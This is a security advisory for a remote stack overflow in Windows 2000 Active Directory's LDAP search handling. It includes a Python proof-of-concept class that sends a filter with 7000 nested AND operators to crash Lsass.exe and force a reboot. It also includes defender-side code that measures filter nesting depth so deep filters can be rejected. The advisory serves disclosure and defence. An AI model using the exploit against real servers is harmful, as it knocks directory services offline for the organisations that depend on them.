Microsoft Windows Active Directory Remote Stack Overflow Vulnerability
Affected program: Win2k Active Directory
Description: Microsoft Windows Active Directory remote stack overflow vulnerability
Details: Windows Active Directory is a core component of the Windows 2000 architecture and the powerful directory service system provided by Microsoft.
The LDAP 3 search request handling in Windows Active Directory lacks proper buffer boundary checks on user-submitted requests. A remote attacker can exploit this flaw to crash the Lsass.exe service, triggering a buffer overflow.
The directory service provided by Active Directory is based on the LDAP protocol and uses that protocol to store and retrieve Active Directory objects. The LDAP 3 'search request' function used by Active Directory has a flaw: if an attacker constructs a request containing more than 1000 "AND" operators and sends it to the server, a stack overflow is triggered, the Lsass.exe service crashes, and the system reboots within 30 seconds.
Attack method: CORE Security Technologies Advisories (advisories@coresecurity.com) provided the following test method:
Below is a Python test script:
------------------------------------
# Assumes the Ldap helper class (bindRequest, searchRequest, encapsulateHeader,
# LDAP_FILTER_* constants) and the asn1 module from the advisory's own tool set;
# neither is reproduced here.
class ActiveDirectoryDos( Ldap ):

    def __init__(self):
        self._s = None
        self.host = '192.168.0.1'
        self.basedn = 'dc=bugweek,dc=corelabs,dc=core-sdi,dc=com'
        self.port = 389
        self.buffer = ''
        self.msg_id = 1
        Ldap.__init__(self)   # base-class initialiser needs the instance

    def generateFilter_BinaryOp( self, filter ):
        # filter is a (operator, attribute, value) tuple; encode attribute and
        # value as OCTET STRINGs and wrap them in the operator's BER header
        filterBuffer = asn1.OCTETSTRING(filter[1]).encode() + asn1.OCTETSTRING(filter[2]).encode()
        filterBuffer = self.encapsulateHeader( filter[0], filterBuffer )
        return filterBuffer

    def generateFilter_RecursiveBinaryOp( self, filter, numTimes):
        # wrap the simple filter in numTimes nested AND operators
        simpleBinOp = self.generateFilter_BinaryOp( filter )
        filterBuffer = simpleBinOp
        for cnt in range( 0, numTimes ):
            filterBuffer = self.encapsulateHeader( self.LDAP_FILTER_AND, filterBuffer + simpleBinOp )
        return filterBuffer

    def searchSub( self, filterBuffer ):
        self.bindRequest()
        self.searchRequest( filterBuffer )

    def run(self, host = '', basedn = '', name = '' ):
        # the machine must not exist
        machine_name = 'xaxax'
        filterComputerNotInDir = (Ldap.LDAP_FILTER_EQUALITY, 'name', machine_name)
        # execute the anonymous query
        print('executing query')
        filterBuffer = self.generateFilter_RecursiveBinaryOp( filterComputerNotInDir, 7000 )
        self.searchSub( filterBuffer )
------------------------------------
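As an added defender-side example (not part of the advisory or of Core's script), the following Python 3 code parses a BER-encoded LDAP filter and reports its AND/OR/NOT nesting depth, so an LDAP proxy or IDS could reject filters nested beyond a policy limit before they reach the directory server. The encoder helpers, the MAX_FILTER_DEPTH value and the sample filter are constructed here for illustration.

```python
# Constructed example: BER tags of the LDAP Filter CHOICE (RFC 4511)
LDAP_FILTER_AND = 0xA0       # [0] SET OF Filter; [1] or = 0xA1, [2] not = 0xA2
LDAP_FILTER_EQUALITY = 0xA3  # [3] AttributeValueAssertion
OCTET_STRING = 0x04
MAX_FILTER_DEPTH = 100       # assumed policy limit, far below the ~1000 ANDs that crash Lsass.exe

def ber_length(n):
    # BER length: short form below 128, long form (0x80 | byte count, then big-endian value) otherwise
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, 'big')
    return bytes([0x80 | len(body)]) + body

def tlv(tag, body):
    return bytes([tag]) + ber_length(len(body)) + body

def equality_filter(attr, value):
    # (attr=value): two OCTET STRINGs under tag [3], as in the advisory's test filter
    return tlv(LDAP_FILTER_EQUALITY, tlv(OCTET_STRING, attr.encode()) + tlv(OCTET_STRING, value.encode()))

def nested_and(leaf, times):
    # wrap the leaf in `times` AND levels, mirroring generateFilter_RecursiveBinaryOp
    buf = leaf
    for _ in range(times):
        buf = tlv(LDAP_FILTER_AND, buf + leaf)
    return buf

def parse_length(data, i):
    # returns (length, index of first body byte)
    first = data[i]
    if first < 0x80:
        return first, i + 1
    n = first & 0x7F
    return int.from_bytes(data[i + 1:i + 1 + n], 'big'), i + 1 + n

def filter_depth(data):
    # max nesting depth of AND/OR/NOT; iterative so a deep filter cannot exhaust the checker's own stack
    max_depth, work = 0, [(0, len(data), 0)]   # work items: (start, end, enclosing depth)
    while work:
        i, end, depth = work.pop()
        while i < end:
            tag = data[i]
            length, body = parse_length(data, i + 1)
            if LDAP_FILTER_AND <= tag <= 0xA2:
                work.append((body, body + length, depth + 1))
                max_depth = max(max_depth, depth + 1)
            i = body + length
    return max_depth

def should_reject(data, limit=MAX_FILTER_DEPTH):
    return filter_depth(data) > limit
```

Running `should_reject(nested_and(equality_filter('name', 'xaxax'), 7000))` on the same 7000-level filter the test script builds returns True, while an ordinary flat or shallowly nested filter passes.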
